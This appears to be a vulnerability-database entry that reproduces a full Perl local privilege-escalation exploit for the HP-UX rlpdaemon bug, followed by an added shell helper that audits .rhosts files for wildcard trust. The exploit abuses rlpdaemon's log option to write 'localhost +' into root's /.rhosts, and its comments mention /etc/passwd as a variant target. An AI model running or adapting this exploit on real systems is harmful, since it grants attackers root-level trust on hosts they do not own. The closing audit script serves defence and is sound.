exploit for old rlpdaemon bug

2014-03-18T00:00:00
ID SECURITYVULNS:DOC:30368
Type securityvulns
Reporter Securityvulns
Modified 2014-03-18T00:00:00

Description

#!/opt/perl5/bin/perl -w
#
# HP-UX rlpdaemon local exploit
#
# Bulletin HPSBUX0111-176 (November 2001)
#
# For use only on machines where you have legitimate root.
#
# This attempts to add junk (including "localhost +") to /.rhosts.
#
# Obvious variants could include /etc/passwd.

use IO::Socket;

$PORT = 9000; # pick something not in use

$pid = fork; die("fork: $!") unless (defined($pid));

if (0 == $pid) { # child - server, exec rlpdaemon with chosen argv

    $IPPROTO_TCP = 6;
    $SOCK_STREAM = 1;
    $AF_INET     = 2;
    $PF_INET     = 2;

    $sockaddr = 'S n a4 x8';  # packed socket data

    $this = pack($sockaddr, $AF_INET, $PORT, "\0\0\0\0") or die("pack: $!");
    socket(S, $PF_INET, $SOCK_STREAM, $IPPROTO_TCP) || die("socket: $!");
    bind(S, $this) or die("bind: $!");
    listen(S, 5) or die("listen: $!");
    $addr = accept(NS, S);

    # dup2 on 3 standard streams
    open(STDIN,  "+<&NS") or die("dup2: $!");
    open(STDOUT, "+>&NS") or die("dup2: $!");
    open(STDERR, "+>&NS") or die("dup2: $!");

    # argv[0] is attacker-chosen and ends up in the log file named by -L
    exec {"/usr/sbin/rlpdaemon"}
        "\nlocalhost +\n",
        "-i", "-l", "-L", "/.rhosts";
    # UNREACHED
    exit(1);

}

sleep 5; # let server start before we connect to it

# parent - connect to server with loggable action

$remote = IO::Socket::INET->new( Proto    => "tcp",
                                 PeerAddr => "localhost",
                                 PeerPort => $PORT )
    or die "cannot connect to port $PORT at localhost";

# RFC1179

printf($remote "%clp\n", 2); # rlpdaemon should log this
close($remote);
exit(0);
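The outcome the script above aims for is a wildcard trust entry ("localhost +") written into /.rhosts through a log file the daemon opens as root. The following audit helper is an added example from the defender's side; it is not part of the original advisory or exploit. It walks a .rhosts-style file and flags every line whose host or user field is the "+" wildcard, and reports whether a given binary carries the setuid bit. The file contents in the usage section are constructed for illustration, and the rlpdaemon path is taken from the exploit, not from any separate HP documentation.

```sh
#!/bin/sh
# Added audit helper (not from the original advisory).  Flags the kind of
# trust entry the exploit tries to inject: a "+" wildcard in the host or
# user field of a .rhosts file.  Sample inputs are constructed below.

# audit_rhosts FILE
# Prints each line of FILE whose host or user field is "+" (RFC 1282 style
# .rhosts syntax: "host [user]"; "+" in either field means "any").
# Returns 0 when no wildcard entry is present, 1 when at least one is.
audit_rhosts() {
    file=$1
    [ -r "$file" ] || return 0       # absent or unreadable: nothing to flag
    found=0
    # Redirecting the file into the loop (not a pipe) keeps $found in scope.
    while IFS=' 	' read -r host user rest; do
        case "$host" in ''|'#'*) continue ;; esac   # skip blanks and comments
        if [ "$host" = "+" ] || [ "$user" = "+" ]; then
            printf 'WILDCARD trust in %s: host=%s user=%s\n' \
                "$file" "$host" "${user:-<any>}"
            found=1
        fi
    done < "$file"
    return $found
}

# count_wildcards FILE
# Number of wildcard lines audit_rhosts reports for FILE.
count_wildcards() {
    audit_rhosts "$1" | wc -l | tr -d ' '
}

# is_setuid PATH
# Succeeds when PATH exists and has the setuid bit; the daemon in the exploit
# is assumed to run with root privileges, which is what makes the log path
# matter, so this is the first thing to check on a host.
is_setuid() {
    [ -u "$1" ]
}

# Usage (constructed sample; on a real host you would pass /.rhosts and the
# per-user ~/.rhosts files):
#   tmp=$(mktemp); printf 'trusted.example.com alice\nlocalhost +\n' > "$tmp"
#   audit_rhosts "$tmp" || echo "wildcard trust found"
#   is_setuid /usr/sbin/rlpdaemon && echo "rlpdaemon is setuid"
```

Run it against /.rhosts and every home directory's .rhosts; a nonzero exit from audit_rhosts on a root-owned file is the indicator that the write described in the exploit (or any equivalent misconfiguration) has already happened.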